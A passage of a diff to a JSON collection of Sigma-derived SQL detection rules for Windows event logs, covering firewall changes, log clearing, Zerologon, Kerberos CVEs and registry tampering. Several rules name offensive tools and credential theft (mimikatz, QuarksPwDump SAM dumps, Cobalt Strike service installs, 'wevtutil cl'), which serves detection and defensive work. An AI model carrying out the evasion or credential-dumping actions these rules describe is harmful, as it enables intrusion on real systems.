"status": "experimental", + "description": "Detects when a rule has been added to the Windows Firewall exception list", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + ], + "filename": "win_firewall_as_add_rule.yml" + }, + { + "title": "Windows Defender Firewall Has Been Reset To Its Default Configuration", + "id": "04b60639-39c0-412a-9fbe-e82499c881a3", + "status": "experimental", + "description": "Detects activity when Windows Defender Firewall has been reset to its default configuration", + "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2032', '2060'))" + ], + "filename": "win_firewall_as_reset_config.yml" + }, + { + "title": "Windows Firewall Settings Have Been Changed", + "id": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", + "status": "experimental", + "description": "Detects activity when the settings of the Windows firewall have been changed", + 
"author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2002', '2083', '2003', '2082', '2008'))" ], + "filename": "win_firewall_as_setting_change.yml" + }, + { + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Unknown" + "Any legitimate application that runs from the AppData user directory" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND NewValue LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND NewValue LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (NewValue = 'http://go.microsoft.com/fwlink/events.asp') OR (NewValue = '(Empty)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows 
Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_event_viewer_events_asp.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", - "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", - "tags": [ - "attack.defense_evasion" + "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", + "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", + "status": "experimental", + "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2006', '2052') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "falsepositives": [ - "Unknown" + "filename": "win_firewall_as_delete_rule.yml" + }, + { + "title": "The Windows 
Defender Firewall Service Failed To Load Group Policy", + "id": "7ec15688-fd24-4177-ba43-1a950537ee39", + "status": "experimental", + "description": "Detects activity when The Windows Defender Firewall service failed to load Group Policy", + "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2009')" ], + "filename": "win_firewall_as_failed_load_gpo.yml" + }, + { + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_firewall_as_delete_all_rules.yml" }, { - "title": "COM Hijacking via TreatAs", - "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "title": "Firewall Rule Modified In The Windows Firewall Exception List", + "id": "5570c4d9-8fdd-4622-965b-403a5a101aa0", 
"status": "experimental", - "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "description": "Detects when a rule has been modified in the windows firewall exception list", "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2005', '2073') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": "win_firewall_as_change_rule.yml" + }, + { + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - 
"filename": "registry_set_treatas_persistence.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "Registry Explorer Policy Modification", - "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", - "status": "test", - "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "author": "frack113", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate admin script" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' 
ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_set_set_nopolicies_user.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Eventlog Cleared", + "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Administrator actions" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" ], - "filename": "registry_set_disable_windows_defender_service.yml" + "filename": "win_system_eventlog_cleared.yml" }, { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry 
value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", - "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "author": "Trent Liffick (@tliffick)", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "status": "test", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_office_security.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": 
"724ea201-6514-4f38-9739-e5973c34f49a", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", - "author": "frack113", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "Disable Tamper Protection on Windows Defender", - "id": "93d298a1-d28f-47f1-a468-d971e7796679", + "title": "NTLMv1 Logon Between Client and Server", + "id": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", "status": "experimental", - "description": "Detects disabling Windows Defender Tamper Protection", - "author": "Austin Songer @austinsonger", + "description": "Detects the reporting of NTLMv1 being used between a client and server", + "author": "Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1550.002", + "attack.s0363" ], 
"falsepositives": [ - "Unknown" + "Environments that use NTLMv1" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'LsaSrv' AND EventID = '6038')" ], - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + "filename": "win_system_lsasrv_ntlmv1.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2021-42278 Exploitation Attempt", + "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", + "status": "test", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - 
"SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38'))" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_system_exploit_cve_2021_42278.yml" }, { - "title": "Disable Internal Tools or Feature in Registry", - "id": "e2482f8d-3443-4237-b906-cc145d87a076", - "status": "experimental", - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential CVE-2021-42287 Exploitation Attempt", + "id": "e80a0fee-1a62-4419-b31e-0d0db6e6013a", + "status": "test", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject 
LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))" + ], + "filename": "win_system_exploit_cve_2021_42287.yml" + }, + { + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with 
\"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "tags": [ + "attack.t1210", + "attack.lateral_movement" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_set_disable_function_user.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - 
"description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "status": "experimental", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + 
